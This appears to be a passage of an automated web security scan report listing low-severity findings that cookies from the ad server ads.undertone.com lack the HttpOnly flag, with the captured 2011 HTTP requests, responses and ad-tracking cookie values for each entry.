11.50. http://ads.undertone.com/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/fc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:15:09 GMT; path=/
UTPROFILES=15141%239%3A1%2C5%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34_1%2C4%7C1023%3A31_28%2C7_27%2C35_1%2C4%7C1146%3A1%2C3%7C1147%3A1%2C3%7C1153%3A1%2C3%7C1158%3A1%2C3%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C3%7C2878%3A1%2C3%7C2881%3A1%2C3%7C2882%3A1%2C4%7C2894%3A1%2C3%7C2897%3A1%2C3%7C2898%3A1%2C4%7C2900%3A1%2C4%7C2901%3A1%2C4%7C2903%3A1%2C4%7C2909%3A1%2C3%7C2917%3A1%2C3%7C2918%3A1%2C3%7C2922%3A1%2C4%7C2924%3A1%2C4%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4; expires=Wed, 14-Sep-2011 12:15:09 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fc.php?dp=8&pid=D,T,5344,5341,5339,5337,5336,5333,5331,5330,5326,5323,2680,2430,2425,2422,2420,1835,1834,1832,1830 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226504796&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=209452.llcw5o-14493_209454.llcw5n-13753_215486.lmvtsl-12268_215465.lmvt2w-12268_215480.lmvt1e-12268_205196.lljpij-4837; UTPROFILES=15141%239%3A1%2C5%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34_1%2C3%7C1023%3A31_28%2C7_27%2C35_1%2C3%7C1146%3A1%2C2%7C1147%3A1%2C2%7C1153%3A1%2C2%7C1158%3A1%2C2%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C2%7C2878%3A1%2C2%7C2881%3A1%2C2%7C2882%3A1%2C3%7C2894%3A1%2C2%7C2897%3A1%2C2%7C2898%3A1%2C3%7C2900%3A1%2C3%7C2901%3A1%2C3%7C2903%3A1%2C3%7C2909%3A1%2C2%7C2917%3A1%2C2%7C2918%3A1%2C2%7C2922%3A1%2C3%7C2924%3A1%2C3%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Thu, 16 Jun 2011 12:15:09 GMT
Connection: close
Set-Cookie: UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:15:09 GMT; path=/
Set-Cookie: UTPROFILES=15141%239%3A1%2C5%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34_1%2C4%7C1023%3A31_28%2C7_27%2C35_1%2C4%7C1146%3A1%2C3%7C1147%3A1%2C3%7C1153%3A1%2C3%7C1158%3A1%2C3%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C3%7C2878%3A1%2C3%7C2881%3A1%2C3%7C2882%3A1%2C4%7C2894%3A1%2C3%7C2897%3A1%2C3%7C2898%3A1%2C4%7C2900%3A1%2C4%7C2901%3A1%2C4%7C2903%3A1%2C4%7C2909%3A1%2C3%7C2917%3A1%2C3%7C2918%3A1%2C3%7C2922%3A1%2C4%7C2924%3A1%2C4%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4; expires=Wed, 14-Sep-2011 12:15:09 GMT; path=/

GIF89a.............!.......,...........D..;

11.51. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215483]=lmvv8c-12267; expires=Sat, 16-Jul-2011 12:41:00 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:41:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215483&campaignid=38114&zoneid=12267&UTLIA=1&cb=7880fe91b69849fe81d0251f5fe28864&bk=lmvv88&id=b12qqb2w639w5unyw5wglaftp HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228056641&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215478.lmvuzs-12268_215487.lmvuzs-12267_215465.lmvur6-12268_215464.lmvur6-12267_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753_215481.lmvu9v-12267_215473.lmvu9v-12268_215480.lmvu19-12268_215486.lmvtsl-12268; UTPROFILES=15141%239%3A1%2C10%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%7C1022%3A31_28%2C7_27%2C34_1%2C7%7C1023%3A31_28%2C7_27%2C35_1%2C7%7C1146%3A1%2C6%7C1147%3A1%2C6%7C1153%3A1%2C6%7C1158%3A1%2C6%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C6%7C2878%3A1%2C6%7C2881%3A1%2C6%7C2882%3A1%2C7%7C2894%3A1%2C6%7C2897%3A1%2C6%7C2898%3A1%2C7%7C2900%3A1%2C7%7C2901%3A1%2C7%7C2903%3A1%2C7%7C2909%3A1%2C6%7C2917%3A1%2C6%7C2918%3A1%2C6%7C2922%3A1%2C7%7C2924%3A1%2C7%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.52. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215471]=lmvzar-12268; expires=Sat, 16-Jul-2011 14:08:51 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 14:08:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215471&campaignid=38112&zoneid=12268&UTLIA=1&ptm=2978&cb=339679f20be345c5ac97a71b58703fd3&bk=lmvzao&id=dfs91oj8reyr5k5bfgplgleme HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233329301&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215477.lmvz25-12267_215486.lmvz25-12268_215465.lmvyky-12268_215473.lmvyck-12268_215470.lmvy3o-12267_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753_215481.lmvxv3-12267_215478.lmvxv3-12268_215474.lmvx5b-12267_215467.lmvx5b-12268_215480.lmvwo9-12268_215468.lmvwo8-12267_215464.lmvvy6-12267_215487.lmvvpk-12267_215483.lmvytj-12267; UTPROFILES=15141%239%3A1%2C36%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%2C5%7C1022%3A31_28%2C7_27%2C34_1%2C21%7C1023%3A31_28%2C7_27%2C35_1%2C20%7C1146%3A1%2C19%7C1147%3A1%2C19%7C1153%3A1%2C20%7C1158%3A1%2C20%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C18%7C2878%3A1%2C18%7C2881%3A1%2C18%7C2882%3A1%2C21%7C2894%3A1%2C18%7C2897%3A1%2C18%7C2898%3A1%2C20%7C2900%3A1%2C20%7C2901%3A1%2C20%7C2903%3A1%2C21%7C2909%3A1%2C19%7C2917%3A1%2C19%7C2918%3A1%2C19%7C2922%3A1%2C20%7C2924%3A1%2C20%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.53. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215470]=lmvwwo-12267; expires=Sat, 16-Jul-2011 13:17:12 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 13:17:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215470&campaignid=38112&zoneid=12267&UTLIA=1&cb=49af2bc9609944108dd209edb95452f7&bk=lmvwwl&id=ad3c3cc0k0wcva0gp3v3gfi3y HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308230228918&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215480.lmvwo9-12268_215468.lmvwo8-12267_215478.lmvwfe-12268_215481.lmvwfd-12267_215477.lmvw6r-12267_215473.lmvvy6-12268_215464.lmvvy6-12267_215487.lmvvpk-12267_215486.lmvvh3-12268_215483.lmvv8c-12267_215465.lmvur6-12268_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753; UTPROFILES=15141%239%3A1%2C21%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%2C3%7C1022%3A31_28%2C7_27%2C34_1%2C13%7C1023%3A31_28%2C7_27%2C35_1%2C13%7C1146%3A1%2C12%7C1147%3A1%2C12%7C1153%3A1%2C12%7C1158%3A1%2C12%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C11%7C2878%3A1%2C12%7C2881%3A1%2C12%7C2882%3A1%2C14%7C2894%3A1%2C12%7C2897%3A1%2C12%7C2898%3A1%2C13%7C2900%3A1%2C13%7C2901%3A1%2C13%7C2903%3A1%2C14%7C2909%3A1%2C12%7C2917%3A1%2C12%7C2918%3A1%2C12%7C2922%3A1%2C13%7C2924%3A1%2C13%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.54. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215465]=lmvt2w-12268; expires=Sat, 16-Jul-2011 11:54:32 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 11:54:32 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215465&campaignid=38112&zoneid=12268&UTLIA=1&cb=31dd3487c7c149fb8dc88dddf9f87ca0&bk=lmvt2t&id=8ydyxc7x65o29woyozu0ws8q HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225268837&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=209452.llcw5o-14493_209454.llcw5n-13753_215480.lmvt1e-12268_205196.lljpij-4837; UTPROFILES=15141%239%3A1%2C2%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34_1%7C1023%3A31_28%2C7_27%2C35_1%7C1146%3A1%7C1147%3A1%7C1153%3A1%7C1158%3A1%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%7C2878%3A1%7C2881%3A1%7C2882%3A1%7C2894%3A1%7C2897%3A1%7C2898%3A1%7C2900%3A1%7C2901%3A1%7C2903%3A1%7C2909%3A1%7C2917%3A1%7C2918%3A1%7C2922%3A1%7C2924%3A1%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.55. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215474]=lmvx5b-12267; expires=Sat, 16-Jul-2011 13:22:23 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 13:22:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215474&campaignid=38112&zoneid=12267&UTLIA=1&ptm=2978&cb=839a4bb4250c4f07b7027e4ded523466&bk=lmvx57&id=beifpj0ggfld0amt8vhjnxlcb HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308230539558&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215467.lmvwwp-12268_215470.lmvwwo-12267_215480.lmvwo9-12268_215468.lmvwo8-12267_215478.lmvwfe-12268_215481.lmvwfd-12267_215477.lmvw6r-12267_215473.lmvvy6-12268_215464.lmvvy6-12267_215487.lmvvpk-12267_215486.lmvvh3-12268_215483.lmvv8c-12267_215465.lmvur6-12268_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753; UTPROFILES=15141%239%3A1%2C23%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%2C3%7C1022%3A31_28%2C7_27%2C34_1%2C14%7C1023%3A31_28%2C7_27%2C35_1%2C14%7C1146%3A1%2C13%7C1147%3A1%2C13%7C1153%3A1%2C13%7C1158%3A1%2C13%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C12%7C2878%3A1%2C13%7C2881%3A1%2C13%7C2882%3A1%2C15%7C2894%3A1%2C13%7C2897%3A1%2C13%7C2898%3A1%2C14%7C2900%3A1%2C14%7C2901%3A1%2C14%7C2903%3A1%2C15%7C2909%3A1%2C13%7C2917%3A1%2C13%7C2918%3A1%2C13%7C2922%3A1%2C14%7C2924%3A1%2C14%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.56. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215487]=lmvu19-12267; expires=Sat, 16-Jul-2011 12:15:09 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:15:09 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215487&campaignid=38114&zoneid=12267&UTLIA=1&cb=0641bca53e894bf094381e31a026eea7&bk=lmvu15&id=djjwgv9ps61khjiw8xrxaqgkm HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226504796&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=209452.llcw5o-14493_209454.llcw5n-13753_215486.lmvtsl-12268_215465.lmvt2w-12268_215480.lmvt1e-12268_205196.lljpij-4837; UTPROFILES=15141%239%3A1%2C5%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34_1%2C3%7C1023%3A31_28%2C7_27%2C35_1%2C3%7C1146%3A1%2C2%7C1147%3A1%2C2%7C1153%3A1%2C2%7C1158%3A1%2C2%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C2%7C2878%3A1%2C2%7C2881%3A1%2C2%7C2882%3A1%2C3%7C2894%3A1%2C2%7C2897%3A1%2C2%7C2898%3A1%2C3%7C2900%3A1%2C3%7C2901%3A1%2C3%7C2903%3A1%2C3%7C2909%3A1%2C2%7C2917%3A1%2C2%7C2918%3A1%2C2%7C2922%3A1%2C3%7C2924%3A1%2C3%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.57. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215477]=lmvw6r-12267; expires=Sat, 16-Jul-2011 13:01:39 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 13:01:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215477&campaignid=38114&zoneid=12267&UTLIA=1&cb=e81eabcda5534d5ca64adfc6cd1be856&bk=lmvw6o&id=a9vbfmzny4mdhvaqsl5odbidj HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308229295898&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215473.lmvvy6-12268_215464.lmvvy6-12267_215487.lmvvpk-12267_215480.lmvvpk-12268_215486.lmvvh3-12268_215483.lmvv8c-12267_215478.lmvuzs-12268_215465.lmvur6-12268_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753_215481.lmvu9v-12267; UTPROFILES=15141%239%3A1%2C16%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%2C2%7C1022%3A31_28%2C7_27%2C34_1%2C10%7C1023%3A31_28%2C7_27%2C35_1%2C10%7C1146%3A1%2C10%7C1147%3A1%2C10%7C1153%3A1%2C10%7C1158%3A1%2C10%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C9%7C2878%3A1%2C9%7C2881%3A1%2C10%7C2882%3A1%2C11%7C2894%3A1%2C9%7C2897%3A1%2C9%7C2898%3A1%2C10%7C2900%3A1%2C10%7C2901%3A1%2C10%7C2903%3A1%2C11%7C2909%3A1%2C10%7C2917%3A1%2C10%7C2918%3A1%2C10%7C2922%3A1%2C11%7C2924%3A1%2C11%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.58. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215468]=lmvwo8-12267; expires=Sat, 16-Jul-2011 13:12:08 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 13:12:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215468&campaignid=38112&zoneid=12267&UTLIA=1&ptm=2978&cb=a60eb74cccaa4c09bdc44de279bd3bc2&bk=lmvwny&id=dlenc2oye4g0691n2qil234kp HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308229917768&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215478.lmvwfe-12268_215481.lmvwfd-12267_215477.lmvw6r-12267_215473.lmvvy6-12268_215464.lmvvy6-12267_215487.lmvvpk-12267_215480.lmvvpk-12268_215486.lmvvh3-12268_215483.lmvv8c-12267_215465.lmvur6-12268_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753; 